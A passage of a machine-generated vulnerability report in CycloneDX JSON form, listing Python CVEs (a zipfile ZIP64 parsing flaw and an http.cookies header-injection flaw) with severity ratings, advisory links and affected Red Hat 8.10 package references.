          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2025-8291",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "bitnami"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        1285
      ],
      "description": "The 'zipfile' module would not check the validity of the ZIP64 End of\nCentral Directory (EOCD) Locator record offset value would not be used to\nlocate the ZIP64 EOCD record, instead the ZIP64 EOCD record would be\nassumed to be the previous record in the ZIP archive. This could be abused\nto create ZIP archives that are handled differently by the 'zipfile' module\ncompared to other ZIP implementations.\n\n\nRemediation maintains this behavior, but checks that the offset specified\nin the ZIP64 EOCD Locator record matches the expected value.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-8291"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:23342"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:23940"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-8291"
        },
        {
          "url": "https://bugzilla.redhat.com/2402342"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294682"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2373234"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2402342"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5642"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6069"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-8291"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2025-23940.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:23342"
        },
        {
          "url": "https://github.com/google/security-research/security/advisories/GHSA-hhv7-p4pg-wm6p"
        },
        {
          "url": "https://github.com/psf/advisory-database/blob/main/advisories/python/PSF-2025-12.json"
        },
        {
          "url": "https://github.com/python/cpython/commit/162997bb70e067668c039700141770687bc8f267"
        },
        {
          "url": "https://github.com/python/cpython/commit/1d29afb0d6218aa8fb5e1e4a6133a4778d89bb46"
        },
        {
          "url": "https://github.com/python/cpython/commit/333d4a6f4967d3ace91492a39ededbcf3faa76a6"
        },
        {
          "url": "https://github.com/python/cpython/commit/76437ac248ad8ca44e9bf697b02b1e2241df2196"
        },
        {
          "url": "https://github.com/python/cpython/commit/8392b2f0d35678407d9ce7d95655a5b77de161b4"
        },
        {
          "url": "https://github.com/python/cpython/commit/bca11ae7d575d87ed93f5dd6a313be6246e3e388"
        },
        {
          "url": "https://github.com/python/cpython/commit/d11e69d6203080e3ec450446bfed0516727b85c3"
        },
        {
          "url": "https://github.com/python/cpython/issues/139700"
        },
        {
          "url": "https://github.com/python/cpython/pull/139702"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2025-8291.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-0123.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/QECOPWMTH4VPPJAXAH2BGTA4XADOP62G/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8291"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7886-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7886-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-8291"
        }
      ],
      "published": "2025-10-07T18:16:00+00:00",
      "updated": "2026-07-31T14:16:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-0672",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.8,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        93
      ],
      "description": "When using http.cookies.Morsel, user-controlled cookie values and parameters can allow injecting HTTP headers into messages. Patch rejects all control characters within cookie names, values, and parameters.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-0672"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19064"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:19177"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-0672"
        },
        {
          "url": "https://bugzilla.redhat.com/2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/2458049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2395108"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2408891"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2418084"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431366"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2431374"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444691"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448168"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2448181"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2449649"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457409"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2457932"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2458049"
        },
        {
          "url": "https://creativecommons.org/licenses/by/4.0/"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-13837"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15282"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-59375"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-6075"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0672"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-1502"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-2297"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3644"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4224"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-4786"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-6100"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-19064.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2026:19177"
        },
        {
          "url": "https://github.com/python/cpython/commit/62700107418eb2cca3fc88da036a243ea975f172"
        },
        {
          "url": "https://github.com/python/cpython/commit/712452e6f1d4b9f7f8c4c92ebfcaac1705faa440"
        },
        {
          "url": "https://github.com/python/cpython/commit/7852d72b653fea0199acf5fc2a84f6f8b84eba8d"
        },
        {
          "url": "https://github.com/python/cpython/commit/918387e4912d12ffc166c8f2a38df92b6ec756ca"
        },
        {
          "url": "https://github.com/python/cpython/commit/95746b3a13a985787ef53b977129041971ed7f70"
        },
        {
          "url": "https://github.com/python/cpython/commit/b1869ff648bbee0717221d09e6deff46617f3e85"
        },
        {
          "url": "https://github.com/python/cpython/issues/143919"
        },
        {
          "url": "https://github.com/python/cpython/pull/143920"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-0672.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-19177.html"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/6VFLQQEIX673KXKFUZXCUNE5AZOGZ45M/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-0672"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8018-3"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8509-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-0672"
        }
      ],
      "published": "2026-01-20T22:15:52+00:00",
      "updated": "2026-06-17T10:11:11+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "3.6.8-77.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/platform-python@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/python3-libs@3.6.8-77.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
